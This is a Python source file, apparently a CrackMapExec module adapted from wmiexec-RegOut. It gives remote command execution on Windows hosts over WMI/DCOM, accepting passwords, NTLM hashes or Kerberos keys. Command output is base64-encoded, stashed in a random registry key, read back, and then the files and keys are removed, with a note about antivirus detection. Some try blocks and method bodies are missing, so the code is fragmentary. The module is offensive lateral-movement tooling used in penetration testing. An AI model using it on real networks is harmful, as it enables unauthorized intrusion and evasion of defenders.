113 lines
5.3 KiB
113 lines
5.3 KiB
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: xiaolichan
# Link: https://github.com/XiaoliChan/wmiexec-RegOut/blob/main/wmiexec-regOut.py
# Note: windows version under NT6 not working with this command execution way
# https://github.com/XiaoliChan/wmiexec-RegOut/blob/main/wmiexec-reg-sch-UnderNT6-wip.py -- WIP
# Description:
# For more details, please check out my repository.
# https://github.com/XiaoliChan/wmiexec-RegOut
# Workflow:
# Stage 1:
# cmd.exe /Q /c {command} > C:\windows\temp\{random}.txt (aka command results)
# powershell convert the command results into base64, and save it into C:\windows\temp\{random2}.txt (now the command results was base64 encoded)
# Create registry path: HKLM:\Software\Classes\hello, then add C:\windows\temp\{random2}.txt into HKLM:\Software\Classes\hello\{NewKey}
# Remove anythings which in C:\windows\temp\
# Stage 2:
# WQL query the HKLM:\Software\Classes\hello\{NewKey} and get results, after the results(base64 strings) retrieved, removed
import time
import uuid
import base64
from cme.helpers.misc import gen_random_string
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login
class WMIEXEC:
def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, interval_time, codec):
self.__host = host
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = lmhash
self.__nthash = nthash
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.__aesKey = aesKey
self.logger = logger
self.__interval_time = interval_time
self.__registry_Path = ""
self.__outputBuffer = ""
self.__retOutput = True
self.__shell = 'cmd.exe /Q /c '
#self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc '
#self.__pwsh = 'powershell.exe -Enc '
self.__pwd = str('C:\\')
self.__codec = codec
self.__dcom = DCOMConnection(self.__host, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, oxidResolver=True, doKerberos=self.__doKerberos ,kdcHost=self.__kdcHost, aesKey=self.__aesKey)
iInterface = self.__dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login, IID_IWbemLevel1Login)
iWbemLevel1Login = IWbemLevel1Login(iInterface)
self.__iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
self.__win32Process, _ = self.__iWbemServices.GetObject('Win32_Process')
def execute(self, command, output=False):
self.__retOutput = output
if self.__retOutput:
command = self.__shell + command
return self.__outputBuffer
def execute_remote(self, command):
self.logger.info(f"Executing command: {command}")
self.__win32Process.Create(command, self.__pwd, None)
except Exception as e:
def execute_WithOutput(self, command):
result_output = f"C:\\windows\\temp\\{str(uuid.uuid4())}.txt"
result_output_b64 = f"C:\\windows\\temp\\{str(uuid.uuid4())}.txt"
keyName = str(uuid.uuid4())
self.__registry_Path = f"Software\\Classes\\{gen_random_string(6)}"
command = fr'''{self.__shell} {command} 1> {result_output} 2>&1 && certutil -encodehex -f {result_output} {result_output_b64} 0x40000001 && for /F "usebackq" %G in ("{result_output_b64}") do reg add HKLM\{self.__registry_Path} /v {keyName} /t REG_SZ /d "%G" /f && del /q /f /s {result_output} {result_output_b64}'''
self.logger.info("Waiting {}s for command completely executed.".format(self.__interval_time))
def queryRegistry(self, keyName):
self.logger.debug(f"Querying registry key: HKLM\\{self.__registry_Path}")
descriptor, _ = self.__iWbemServices.GetObject('StdRegProv')
descriptor = descriptor.SpawnInstance()
retVal = descriptor.GetStringValue(2147483650, self.__registry_Path, keyName)
self.__outputBuffer = base64.b64decode(retVal.sValue).decode(self.__codec, errors='replace').rstrip('\r\n')
except Exception as e:
self.logger.fail(f'WMIEXEC: Get output file error, maybe command not executed successfully or got detected by AV software, please increase the interval time of command execution with "--interval-time" option. If it\'s still failing maybe something is blocking the schedule job in vbscript, try another exec method')
self.logger.debug(f"Removing temporary registry path: HKLM\\{self.__registry_Path}")
retVal = descriptor.DeleteKey(2147483650, self.__registry_Path)
except Exception as e:
self.logger.debug(f"Target: {self.__host} removing temporary registry path error: {str(e)}") |